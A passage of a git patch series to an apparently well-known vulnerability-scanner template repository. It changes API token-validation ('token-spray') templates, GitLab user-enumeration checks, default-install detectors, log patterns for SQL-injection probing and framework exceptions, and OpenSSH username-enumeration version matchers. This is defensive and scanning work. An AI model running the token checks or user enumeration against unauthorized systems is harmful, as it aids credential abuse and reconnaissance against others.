token-spray/api-buttercms.yaml index 15d86d53fe..21b6d1dff1 100644 --- a/token-spray/buttercms.yaml +++ b/token-spray/api-buttercms.yaml @@ -14,7 +14,10 @@ requests: - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"meta":' + - '"data":' + - '"url":' + condition: and \ No newline at end of file diff --git a/token-spray/calendly.yaml b/token-spray/api-calendly.yaml similarity index 71% rename from token-spray/calendly.yaml rename to token-spray/api-calendly.yaml index b54a5c8df8..10a8e83478 100644 --- a/token-spray/calendly.yaml +++ b/token-spray/api-calendly.yaml @@ -16,6 +16,10 @@ requests: X-Token: "{{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"data":' + - '"id":' + - '"email":' + condition: and \ No newline at end of file diff --git a/token-spray/circleci.yaml b/token-spray/api-circleci.yaml similarity index 71% rename from token-spray/circleci.yaml rename to token-spray/api-circleci.yaml index d519f10651..cfe7672786 100644 --- a/token-spray/circleci.yaml +++ b/token-spray/api-circleci.yaml @@ -14,6 +14,9 @@ requests: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"admin"' + - '"login"' + condition: and diff --git a/token-spray/api-cooperhewitt.yaml b/token-spray/api-cooperhewitt.yaml index 339f8ed1b2..a15d91a73e 100644 --- a/token-spray/api-cooperhewitt.yaml +++ b/token-spray/api-cooperhewitt.yaml @@ -14,6 +14,10 @@ requests: - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"stat":' + - '"formats":' + - '"default_format":' + condition: and diff --git a/token-spray/deviantart.yaml b/token-spray/api-deviantart.yaml similarity index 88% rename from token-spray/deviantart.yaml rename to token-spray/api-deviantart.yaml index ab73e7ea0d..b09e9acd2b 100644 --- a/token-spray/deviantart.yaml +++ b/token-spray/api-deviantart.yaml @@ -3,8 +3,8 @@ id: api-deviantart info: name: DeviantArt API Test author: zzeitlin - reference: https://www.deviantart.com/developers/authentication severity: info + reference: https://www.deviantart.com/developers/authentication tags: token-spray,deviantart self-contained: true @@ -18,5 +18,4 @@ requests: - type: word part: body words: - - '"status":"error"' - negative: true + - '"status" : "success"' diff --git a/token-spray/api-europeana.yaml b/token-spray/api-europeana.yaml index 69c55b1560..527bf6dd4c 100644 --- a/token-spray/api-europeana.yaml +++ b/token-spray/api-europeana.yaml @@ -14,6 +14,10 @@ requests: - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - 'success' + - 'apikey' + - 'action' + condition: and \ No newline at end of file diff --git a/token-spray/api-leanix.yaml b/token-spray/api-leanix.yaml index 53be0b6e95..172d00ec30 100644 --- a/token-spray/api-leanix.yaml +++ b/token-spray/api-leanix.yaml @@ -21,5 +21,6 @@ requests: - type: word part: body words: - - "Credentials are required" - negative: true + - '"input":' + - '"connectorType":' + condition: and \ No newline at end of file diff --git a/token-spray/api-strava.yaml b/token-spray/api-strava.yaml index b7ec7eb8b9..f81d4897ba 100644 --- a/token-spray/api-strava.yaml +++ b/token-spray/api-strava.yaml @@ -19,5 +19,6 @@ requests: - type: word part: body words: - - "Authorization Error" - negative: true + - '"id"' + - '"username"' + condition: and diff --git a/token-spray/api-taiga.yaml b/token-spray/api-taiga.yaml index b22fc01cf8..6e8748bdf1 100644 --- a/token-spray/api-taiga.yaml +++ b/token-spray/api-taiga.yaml @@ -19,5 +19,6 @@ requests: - type: word part: body words: - - "token_not_valid" - negative: true + - '"auth_code":' + - '"state":' + condition: and diff --git a/token-spray/api-thecatapi.yaml b/token-spray/api-thecatapi.yaml index f8399778d8..b5c7dab4ac 100644 --- a/token-spray/api-thecatapi.yaml +++ b/token-spray/api-thecatapi.yaml @@ -16,7 +16,9 @@ requests: x-api-key: "{{token}}" matchers: - - type: status - negative: true - status: - - 401 + - type: word + part: body + words: + - '"country_code":' + - '"created_at":' + condition: and diff --git a/token-spray/api-webex.yaml b/token-spray/api-webex.yaml index e8f60ed51b..c5e61ded0b 100644 --- a/token-spray/api-webex.yaml +++ b/token-spray/api-webex.yaml @@ -19,5 +19,7 @@ requests: - type: word part: body words: - - "errors" - negative: true + - 'id' + - 'title' + - 'type' + condition: and From 56f8b299cec9ccceae98cf86b177d894fd9dd246 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 1 Nov 2021 19:16:50 +0530 Subject: [PATCH 3341/4083] Added Issue template for False Negative result --- .github/ISSUE_TEMPLATE/false-negative.md | 21 +++++++++++++++++++++ .github/ISSUE_TEMPLATE/false-positive.md | 2 +- 2 files changed, 22 insertions(+), 1 deletion(-) create mode 100644 .github/ISSUE_TEMPLATE/false-negative.md diff --git a/.github/ISSUE_TEMPLATE/false-negative.md b/.github/ISSUE_TEMPLATE/false-negative.md new file mode 100644 index 0000000000..0ec92b3b0e --- /dev/null +++ b/.github/ISSUE_TEMPLATE/false-negative.md @@ -0,0 +1,21 @@ +--- +name: False Negative +about: 'Issue for template missing valid/expected result.' +labels: 'false-negative' + +--- + + + +### Nuclei Version: + + + +### Template file: + + + +### Command to reproduce: + + + \ No newline at end of file diff --git a/.github/ISSUE_TEMPLATE/false-positive.md b/.github/ISSUE_TEMPLATE/false-positive.md index 3cc006eb06..9db346e406 100644 --- a/.github/ISSUE_TEMPLATE/false-positive.md +++ b/.github/ISSUE_TEMPLATE/false-positive.md @@ -1,6 +1,6 @@ --- name: False Positive -about: 'Issue for template producing false positive results.' +about: 'Issue for template producing invalid/unexpected result.' labels: 'false-positive' --- From b83e79a8fef2b86842121c71c47a6d86fd3a3aef Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 1 Nov 2021 19:36:21 +0530 Subject: [PATCH 3342/4083] moving files around --- .../gitlab/gitlab-api-user-enum.yaml | 2 +- misconfiguration/gitlab/gitlab-graphql-user-enum.yaml | 6 +++--- misconfiguration/gitlab/gitlab-public-repos.yaml | 2 +- misconfiguration/gitlab/gitlab-public-signup.yaml | 7 ++++--- misconfiguration/gitlab/gitlab-public-snippets.yaml | 7 ++++--- .../gitlab/gitlab-user-enum.yaml | 8 ++++---- 6 files changed, 17 insertions(+), 15 deletions(-) rename {vulnerabilities => misconfiguration}/gitlab/gitlab-api-user-enum.yaml (96%) rename {vulnerabilities => misconfiguration}/gitlab/gitlab-user-enum.yaml (89%) diff --git a/vulnerabilities/gitlab/gitlab-api-user-enum.yaml b/misconfiguration/gitlab/gitlab-api-user-enum.yaml similarity index 96% rename from vulnerabilities/gitlab/gitlab-api-user-enum.yaml rename to misconfiguration/gitlab/gitlab-api-user-enum.yaml index 3b80afca18..493f36650f 100644 --- a/vulnerabilities/gitlab/gitlab-api-user-enum.yaml +++ b/misconfiguration/gitlab/gitlab-api-user-enum.yaml @@ -4,8 +4,8 @@ info: author: Suman_Kar name: GitLab - User Information Disclosure Via Open API severity: medium - tags: gitlab,disclosure reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 + tags: gitlab,enum,misconfig requests: - raw: diff --git a/misconfiguration/gitlab/gitlab-graphql-user-enum.yaml b/misconfiguration/gitlab/gitlab-graphql-user-enum.yaml index 21a0f3a5ee..d510556e85 100644 --- a/misconfiguration/gitlab/gitlab-graphql-user-enum.yaml +++ b/misconfiguration/gitlab/gitlab-graphql-user-enum.yaml @@ -4,7 +4,7 @@ info: name: Gitlab User enumeration via Graphql API author: pikpikcu severity: info - tags: gitlab,enum + tags: gitlab,enum,misconfig requests: - method: POST @@ -21,16 +21,16 @@ requests: matchers-condition: and matchers: - type: word + part: header words: - "application/json" - part: header - type: word + condition: and words: - avatarUrl - username - email - condition: and - type: status status: diff --git a/misconfiguration/gitlab/gitlab-public-repos.yaml b/misconfiguration/gitlab/gitlab-public-repos.yaml index 0a2869055e..47cf9a59af 100644 --- a/misconfiguration/gitlab/gitlab-public-repos.yaml +++ b/misconfiguration/gitlab/gitlab-public-repos.yaml @@ -4,7 +4,7 @@ info: name: GitLab public repositories author: ldionmarcil severity: info - tags: gitlab + tags: gitlab,exposure,misconfig reference: - https://twitter.com/ldionmarcil/status/1370052344562470922 - https://github.com/ldionmarcil/gitlab-unauth-parser diff --git a/misconfiguration/gitlab/gitlab-public-signup.yaml b/misconfiguration/gitlab/gitlab-public-signup.yaml index dab4bac4c0..7fa82fb778 100644 --- a/misconfiguration/gitlab/gitlab-public-signup.yaml +++ b/misconfiguration/gitlab/gitlab-public-signup.yaml @@ -1,9 +1,10 @@ id: gitlab-public-signup + info: name: GitLab public signup author: pdteam severity: info - tags: gitlab + tags: gitlab,misconfig requests: - method: GET @@ -26,6 +27,6 @@ requests: - 200 - type: word + negative: true words: - - '' - negative: true \ No newline at end of file + - '' \ No newline at end of file diff --git a/misconfiguration/gitlab/gitlab-public-snippets.yaml b/misconfiguration/gitlab/gitlab-public-snippets.yaml index aff6a9ff43..bc43cb3a4b 100644 --- a/misconfiguration/gitlab/gitlab-public-snippets.yaml +++ b/misconfiguration/gitlab/gitlab-public-snippets.yaml @@ -1,9 +1,10 @@ id: gitlab-public-snippets + info: name: GitLab public snippets author: pdteam severity: info - tags: gitlab + tags: gitlab,exposure,misconfig reference: - https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10 - https://twitter.com/intigriti/status/1375078783338876929 @@ -23,10 +24,10 @@ requests: - type: status status: - 200 + - type: word + negative: true condition: or words: - "No snippets found" - "Nothing here." - negative: true - part: body diff --git a/vulnerabilities/gitlab/gitlab-user-enum.yaml b/misconfiguration/gitlab/gitlab-user-enum.yaml similarity index 89% rename from vulnerabilities/gitlab/gitlab-user-enum.yaml rename to misconfiguration/gitlab/gitlab-user-enum.yaml index 3c6e37257c..f269af255e 100644 --- a/vulnerabilities/gitlab/gitlab-user-enum.yaml +++ b/misconfiguration/gitlab/gitlab-user-enum.yaml @@ -4,11 +4,10 @@ info: author: Suman_Kar name: GitLab - User Enumeration severity: info - tags: gitlab,enumeration reference: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/malenames-usa-top1000.txt + tags: gitlab,enum,misconfig requests: - - raw: - | GET /users/{{user}}/exists HTTP/1.1 @@ -18,6 +17,7 @@ requests: payloads: user: helpers/wordlists/user-list.txt + stop-at-first-match: true matchers-condition: and matchers: @@ -32,6 +32,6 @@ requests: - 200 - type: word + part: header words: - - "application/json" - part: header \ No newline at end of file + - "application/json" \ No newline at end of file From 464d0308b353784c2adace955cbd3e5f6109577b Mon Sep 17 00:00:00 2001 From: adoering Date: Mon, 1 Nov 2021 11:12:02 -0500 Subject: [PATCH 3343/4083] Adding default web install application check and supporting templates --- .../default-apache-install-all-versions.yaml | 22 ++++++++++++++ technologies/default-detect-generic.yaml | 29 +++++++++++++++++++ ...web-application-installation-workflow.yaml | 29 +++++++++++++++++++ 3 files changed, 80 insertions(+) create mode 100644 technologies/apache/default-apache-install-all-versions.yaml create mode 100644 technologies/default-detect-generic.yaml create mode 100644 workflows/detect-default-web-application-installation-workflow.yaml diff --git a/technologies/apache/default-apache-install-all-versions.yaml b/technologies/apache/default-apache-install-all-versions.yaml new file mode 100644 index 0000000000..c41c24c985 --- /dev/null +++ b/technologies/apache/default-apache-install-all-versions.yaml @@ -0,0 +1,22 @@ +id: default-apache-test-all +info: + name: Apache HTTP Server Test Page + author: andydoering + description: Detects default installations of apache (not just apache2 or installations on CentOS) + severity: info + tags: tech,apache + reference: https://www.shodan.io/search?query=http.title%3A%22Apache+Default%22%2C%22Apache+HTTP+Server+Test%22%2C%22Apache2+It+works%22 +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers: + - type: regex # type of the extractor + part: body # part of the response (header,body,all) + regex: + - ".*?Apache(|\\d+) .*?(Default|Test).*?" + + - type: regex # type of the extractor + part: body # part of the response (header,body,all) + regex: + - "(Default|Test).*? Apache(|\\d+).*?" \ No newline at end of file diff --git a/technologies/default-detect-generic.yaml b/technologies/default-detect-generic.yaml new file mode 100644 index 0000000000..951027e95c --- /dev/null +++ b/technologies/default-detect-generic.yaml @@ -0,0 +1,29 @@ +id: default-detect-generic +info: + name: Default Web Application Detection + author: andydoering + description: Catch-all for detecting default installations of web applications using common phrases found in default install pages + severity: info + tags: tech,default + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: or + matchers: + + - type: word + words: + - "Default" + part: body + + - type: word + words: + - "Welcome to" + part: body + + - type: status + status: + - 200 \ No newline at end of file diff --git a/workflows/detect-default-web-application-installation-workflow.yaml b/workflows/detect-default-web-application-installation-workflow.yaml new file mode 100644 index 0000000000..f3d4bf2a06 --- /dev/null +++ b/workflows/detect-default-web-application-installation-workflow.yaml @@ -0,0 +1,29 @@ +id: default-detect + +info: + name: Default Web Application Detection + author: andydoering + description: Detects default installations of web applications + severity: info + tags: tech,default,apache,xampp,iis,azure,asp,nginx,lighttpd,django,oracle,ibm + +requests: + - method: GET + path: + - "{{BaseURL}}" + +workflows: + - template: technologies/apache/default-apache-install-all-versions.yaml + - template: technologies/apache/xampp-default-page.yaml + - template: technologies/microsoft/default-iis7-page.yaml + - template: technologies/microsoft/default-windows-server-page.yaml + - template: technologies/microsoft/default-microsoft-azure-page.yaml + - template: technologies/default-asp.net-page.yaml + - template: technologies/nginx/default-nginx-page.yaml + - template: technologies/lighttpd-default.yaml + - template: technologies/default-django-page.yaml + - template: exposures/files/drupal-install.yaml + - template: technologies/oracle/default-oracle-application-page.yaml + - template: technologies/ibm-http-server.yaml + - template: technologies/lighttpd-default.yaml + - template: technologies/default-detect-generic.yaml \ No newline at end of file From 06decc212997edc90891fc1ae709f2cba8a692c5 Mon Sep 17 00:00:00 2001 From: Andy Doering <79484432+and-bf@users.noreply.github.com> Date: Mon, 1 Nov 2021 12:36:30 -0500 Subject: [PATCH 3344/4083] Updated to remove trailing spaces --- technologies/apache/default-apache-install-all-versions.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/technologies/apache/default-apache-install-all-versions.yaml b/technologies/apache/default-apache-install-all-versions.yaml index c41c24c985..228bebdae5 100644 --- a/technologies/apache/default-apache-install-all-versions.yaml +++ b/technologies/apache/default-apache-install-all-versions.yaml @@ -15,8 +15,7 @@ requests: part: body # part of the response (header,body,all) regex: - ".*?Apache(|\\d+) .*?(Default|Test).*?" - - type: regex # type of the extractor part: body # part of the response (header,body,all) regex: - - "(Default|Test).*? Apache(|\\d+).*?" \ No newline at end of file + - "(Default|Test).*? Apache(|\\d+).*?" From e34a08b980dd11baa4d0940b08b727029a6e4f70 Mon Sep 17 00:00:00 2001 From: Andy Doering <79484432+and-bf@users.noreply.github.com> Date: Mon, 1 Nov 2021 12:37:07 -0500 Subject: [PATCH 3345/4083] Updated ID name to reflect workflow name --- .../detect-default-web-application-installation-workflow.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/workflows/detect-default-web-application-installation-workflow.yaml b/workflows/detect-default-web-application-installation-workflow.yaml index f3d4bf2a06..262eaf0c12 100644 --- a/workflows/detect-default-web-application-installation-workflow.yaml +++ b/workflows/detect-default-web-application-installation-workflow.yaml @@ -1,4 +1,4 @@ -id: default-detect +id: detect-default-web-application-installation-workflow info: name: Default Web Application Detection @@ -26,4 +26,4 @@ workflows: - template: technologies/oracle/default-oracle-application-page.yaml - template: technologies/ibm-http-server.yaml - template: technologies/lighttpd-default.yaml - - template: technologies/default-detect-generic.yaml \ No newline at end of file + - template: technologies/default-detect-generic.yaml From 694fb76e2a9eda7456453dacf83890dfe9682e67 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 1 Nov 2021 23:22:57 +0530 Subject: [PATCH 3346/4083] Added version extractor --- .../default-apache-install-all-versions.yaml | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/technologies/apache/default-apache-install-all-versions.yaml b/technologies/apache/default-apache-install-all-versions.yaml index 228bebdae5..4004d97de2 100644 --- a/technologies/apache/default-apache-install-all-versions.yaml +++ b/technologies/apache/default-apache-install-all-versions.yaml @@ -1,21 +1,29 @@ id: default-apache-test-all + info: name: Apache HTTP Server Test Page author: andydoering description: Detects default installations of apache (not just apache2 or installations on CentOS) severity: info tags: tech,apache - reference: https://www.shodan.io/search?query=http.title%3A%22Apache+Default%22%2C%22Apache+HTTP+Server+Test%22%2C%22Apache2+It+works%22 + metadata: + shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works" + requests: - method: GET path: - '{{BaseURL}}' + matchers: - type: regex # type of the extractor part: body # part of the response (header,body,all) + condition: or regex: - ".*?Apache(|\\d+) .*?(Default|Test).*?" - - type: regex # type of the extractor - part: body # part of the response (header,body,all) - regex: - "(Default|Test).*? Apache(|\\d+).*?" + + extractors: + - type: kval + part: header + kval: + - server \ No newline at end of file From 4266c264f6547440d27789586898a9b881e8503b Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 1 Nov 2021 23:24:59 +0530 Subject: [PATCH 3347/4083] matcher update --- technologies/default-detect-generic.yaml | 17 +++++------------ 1 file changed, 5 insertions(+), 12 deletions(-) diff --git a/technologies/default-detect-generic.yaml b/technologies/default-detect-generic.yaml index 951027e95c..974585c135 100644 --- a/technologies/default-detect-generic.yaml +++ b/technologies/default-detect-generic.yaml @@ -1,29 +1,22 @@ id: default-detect-generic + info: name: Default Web Application Detection author: andydoering description: Catch-all for detecting default installations of web applications using common phrases found in default install pages severity: info - tags: tech,default + tags: tech requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: or matchers: - type: word + part: body + condition: or words: - "Default" - part: body - - - type: word - words: - - "Welcome to" - part: body - - - type: status - status: - - 200 \ No newline at end of file + - "Welcome to" \ No newline at end of file From a0478b2bb3f589858f8ab20322b40224fad87c97 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 1 Nov 2021 23:37:50 +0530 Subject: [PATCH 3348/4083] workflow syntax fix --- ...rsions.yaml => default-apache-test-all.yaml} | 0 ...w.yaml => default-application-workflow.yaml} | 17 +++++------------ 2 files changed, 5 insertions(+), 12 deletions(-) rename technologies/apache/{default-apache-install-all-versions.yaml => default-apache-test-all.yaml} (100%) rename workflows/{detect-default-web-application-installation-workflow.yaml => default-application-workflow.yaml} (62%) diff --git a/technologies/apache/default-apache-install-all-versions.yaml b/technologies/apache/default-apache-test-all.yaml similarity index 100% rename from technologies/apache/default-apache-install-all-versions.yaml rename to technologies/apache/default-apache-test-all.yaml diff --git a/workflows/detect-default-web-application-installation-workflow.yaml b/workflows/default-application-workflow.yaml similarity index 62% rename from workflows/detect-default-web-application-installation-workflow.yaml rename to workflows/default-application-workflow.yaml index 262eaf0c12..0c9c1de16c 100644 --- a/workflows/detect-default-web-application-installation-workflow.yaml +++ b/workflows/default-application-workflow.yaml @@ -1,29 +1,22 @@ -id: detect-default-web-application-installation-workflow +id: default-application-workflow info: name: Default Web Application Detection author: andydoering description: Detects default installations of web applications - severity: info - tags: tech,default,apache,xampp,iis,azure,asp,nginx,lighttpd,django,oracle,ibm - -requests: - - method: GET - path: - - "{{BaseURL}}" workflows: - - template: technologies/apache/default-apache-install-all-versions.yaml + - template: technologies/apache/default-apache-test-all.yaml - template: technologies/apache/xampp-default-page.yaml - template: technologies/microsoft/default-iis7-page.yaml - template: technologies/microsoft/default-windows-server-page.yaml - template: technologies/microsoft/default-microsoft-azure-page.yaml - - template: technologies/default-asp.net-page.yaml + - template: technologies/default-asp-net-page.yaml - template: technologies/nginx/default-nginx-page.yaml - template: technologies/lighttpd-default.yaml - template: technologies/default-django-page.yaml - template: exposures/files/drupal-install.yaml - template: technologies/oracle/default-oracle-application-page.yaml - - template: technologies/ibm-http-server.yaml + - template: technologies/ibm/ibm-http-server.yaml - template: technologies/lighttpd-default.yaml - - template: technologies/default-detect-generic.yaml + - template: technologies/default-detect-generic.yaml \ No newline at end of file From 4c6ea2cc6dffe8e5e4f713b025fe8b2dd54087d5 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 1 Nov 2021 13:18:33 -0500 Subject: [PATCH 3349/4083] Create suspicious-sql-error-messages.yaml --- file/logs/suspicious-sql-error-messages.yaml | 35 ++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 file/logs/suspicious-sql-error-messages.yaml diff --git a/file/logs/suspicious-sql-error-messages.yaml b/file/logs/suspicious-sql-error-messages.yaml new file mode 100644 index 0000000000..b1857d3a3c --- /dev/null +++ b/file/logs/suspicious-sql-error-messages.yaml @@ -0,0 +1,35 @@ +id: suspicious-sql-error-messages + +info: + name: Suspicious SQL Error Messages + description: Detects SQL error messages that indicate probing for an injection attack + author: geeknik + severity: high + tags: file,logs,sql + +file: + - extensions: + - all + + extractors: + - type: regex + name: oracle + part: body + regex: + - 'quoted string not properly terminated' + - type: regex + name: mysql + part: body + regex: + - 'You have an error in your SQL syntax' + - type: regex + name: sql_server + part: body + regex: + - 'Unclosed quotation mark' + - type: regex + name: sqlite + part: body + regex: + - 'near \"\*\"\: syntax error' + - 'SELECTs to the left and right of UNION do not have the same number of result columns' From c64a8e1c737c971e2bac796d390aec220c05e066 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 1 Nov 2021 13:19:36 -0500 Subject: [PATCH 3350/4083] Create django-framework-exceptions.yaml --- file/logs/django-framework-exceptions.yaml | 33 ++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 file/logs/django-framework-exceptions.yaml diff --git a/file/logs/django-framework-exceptions.yaml b/file/logs/django-framework-exceptions.yaml new file mode 100644 index 0000000000..5586203869 --- /dev/null +++ b/file/logs/django-framework-exceptions.yaml @@ -0,0 +1,33 @@ +id: django-framework-exceptions + +info: + name: Django Framework Exceptions + description: Detects suspicious Django web application framework exceptions that could indicate exploitation attempts + author: geeknik + reference: + - https://docs.djangoproject.com/en/1.11/ref/exceptions/ + - https://docs.djangoproject.com/en/1.11/topics/logging/#django-security + severity: medium + tags: file,logs,django + +file: + - extensions: + - all + + extractors: + - type: regex + name: exception + part: body + regex: + - 'SuspiciousOperation' + - 'DisallowedHost' + - 'DisallowedModelAdminLookup' + - 'DisallowedModelAdminToField' + - 'DisallowedRedirect' + - 'InvalidSessionKey' + - 'RequestDataTooBig' + - 'SuspiciousFileOperation' + - 'SuspiciousMultipartForm' + - 'SuspiciousSession' + - 'TooManyFieldsSent' + - 'PermissionDenied' From 57183b4b50d832142205a8a005b106d5e7ee6371 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 1 Nov 2021 13:20:06 -0500 Subject: [PATCH 3351/4083] Create python-app-sql-exceptions.yaml --- file/logs/python-app-sql-exceptions.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 file/logs/python-app-sql-exceptions.yaml diff --git a/file/logs/python-app-sql-exceptions.yaml b/file/logs/python-app-sql-exceptions.yaml new file mode 100644 index 0000000000..b4529f7cfc --- /dev/null +++ b/file/logs/python-app-sql-exceptions.yaml @@ -0,0 +1,23 @@ +id: python-app-sql-exceptions + +info: + name: Python App SQL Exception Check + description: Generic check for SQL exceptions in Python according to PEP 249 + reference: https://www.python.org/dev + author: geeknik + severity: medium + tags: file,logs,python,sql + +file: + - extensions: + - all + + extractors: + - type: regex + name: exception + part: body + regex: + - 'DataError' + - 'IntegrityError' + - 'ProgrammingError' + - 'OperationalError' From c527bdb8b891edf55bb347c2155c0214a681b76e Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 1 Nov 2021 13:20:30 -0500 Subject: [PATCH 3352/4083] Create ruby-on-rails-framework-exceptions.yaml --- .../ruby-on-rails-framework-exceptions.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 file/logs/ruby-on-rails-framework-exceptions.yaml diff --git a/file/logs/ruby-on-rails-framework-exceptions.yaml b/file/logs/ruby-on-rails-framework-exceptions.yaml new file mode 100644 index 0000000000..79f72f58c0 --- /dev/null +++ b/file/logs/ruby-on-rails-framework-exceptions.yaml @@ -0,0 +1,28 @@ +id: ruby-on-rails-framework-exceptions + +info: + name: Ruby on Rails Framework Exceptions + description: Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts + author: geeknik + reference: + - http://edgeguides.rubyonrails.org/security.html + - http://guides.rubyonrails.org/action_controller_overview.html + - https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception + - https://github.com/rails/rails/blob/master/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb + severity: medium + tags: file,logs,ruby,rails + +file: + - extensions: + - all + + extractors: + - type: regex + name: exception + part: body + regex: + - 'ActionController\:\:InvalidAuthenticityToken' + - 'ActionController::InvalidCrossOriginRequest' + - 'ActionController::MethodNotAllowed' + - 'ActionController::BadRequest' + - 'ActionController::ParameterMissing' From ee5e250560532ea33a44ed88039afe4675a0be3b Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 1 Nov 2021 13:21:02 -0500 Subject: [PATCH 3353/4083] Create spring-framework-exceptions.yaml --- file/logs/spring-framework-exceptions.yaml | 27 ++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 file/logs/spring-framework-exceptions.yaml diff --git a/file/logs/spring-framework-exceptions.yaml b/file/logs/spring-framework-exceptions.yaml new file mode 100644 index 0000000000..d8bae65b20 --- /dev/null +++ b/file/logs/spring-framework-exceptions.yaml @@ -0,0 +1,27 @@ +id: spring-framework-exceptions + +info: + name: Spring Framework Exceptions + description: Detects suspicious Spring framework exceptions that could indicate exploitation attempts + author: geeknik + reference: + - https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html + severity: medium + tags: file,logs,spring + +file: + - extensions: + - all + + extractors: + - type: regex + name: exception + part: body + regex: + - 'AccessDeniedException' + - 'CsrfException' + - 'InvalidCsrfTokenException' + - 'MissingCsrfTokenException' + - 'CookieTheftException' + - 'InvalidCookieException' + - 'RequestRejectedException' From 5c3bbbb7408a3cdd47d1ef884e1507ae50e5e04c Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Mon, 1 Nov 2021 20:34:47 +0200 Subject: [PATCH 3354/4083] Update SSH user enum templates SSH header structure: SSH-protoversion-softwareversion[SPcomments]CRLF see: https://datatracker.ietf.org/doc/html/rfc4253#section-4.2 --- cves/2016/CVE-2016-6210.yaml | 18 ++++++++++++------ cves/2018/CVE-2018-15473.yaml | 8 ++++---- 2 files changed, 16 insertions(+), 10 deletions(-) diff --git a/cves/2016/CVE-2016-6210.yaml b/cves/2016/CVE-2016-6210.yaml index a43f9a10b5..2b99ccba61 100644 --- a/cves/2016/CVE-2016-6210.yaml +++ b/cves/2016/CVE-2016-6210.yaml @@ -1,15 +1,16 @@ id: CVE-2016-6210 info: - name: OpenSSH 5.3 Detection - author: iamthefrogy + name: OpenSSH username enumeration < v7.3 + author: iamthefrogy,forgedhallpass severity: medium tags: network,openssh - description: OpenSSH 5.3 is vulnerable to username enumeration and DoS vulnerabilities. + description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 - https://security-tracker.debian.org/tracker/CVE-2016-6210 - http://openwall.com/lists/oss-security/2016/08/01/2 + - https://nvd.nist.gov/vuln/detail/CVE-2016-6210 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.9 @@ -21,6 +22,11 @@ network: - "{{Hostname}}" - "{{Hostname}}:22" matchers: - - type: word - words: - - "SSH-2.0-OpenSSH_5.3" + - type: regex + regex: + - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-2][^\d][^\r]+)' + + extractors: + - type: regex + regex: + - '(?i)SSH-2.0-OpenSSH_[^\r]+' \ No newline at end of file diff --git a/cves/2018/CVE-2018-15473.yaml b/cves/2018/CVE-2018-15473.yaml index 172a910f59..9fa15ec402 100644 --- a/cves/2018/CVE-2018-15473.yaml +++ b/cves/2018/CVE-2018-15473.yaml @@ -1,8 +1,8 @@ id: CVE-2018-15473 info: - name: OpenSSH Username Enumeration - author: r3dg33k,daffainfo + name: OpenSSH Username Enumeration <= v7.7 + author: r3dg33k,daffainfo,forgedhallpass severity: medium description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 @@ -21,9 +21,9 @@ network: matchers: - type: regex regex: - - 'SSH-2.0-OpenSSH_[1-7]' + - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)' extractors: - type: regex regex: - - 'SSH-2.0-OpenSSH_([0-9.]+)' + - '(?i)SSH-2.0-OpenSSH_[^\r]+' From dc81d636301f68c9c44d7dc9c785efba04a5556f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 2 Nov 2021 10:49:21 +0530 Subject: [PATCH 3355/4083] matcher fixed --- token-spray/{dropbox.yaml => api-dropbox.yaml} | 9 ++++++--- token-spray/{facebook.yaml => api-facebook.yaml} | 0 .../{fontawesome.yaml => api-fontawesome.yaml} | 5 +++-- ...itoken-cloud.yaml => api-fortitoken-cloud.yaml} | 0 token-spray/{github.yaml => api-github.yaml} | 4 +++- .../{sonarcloud.yaml => 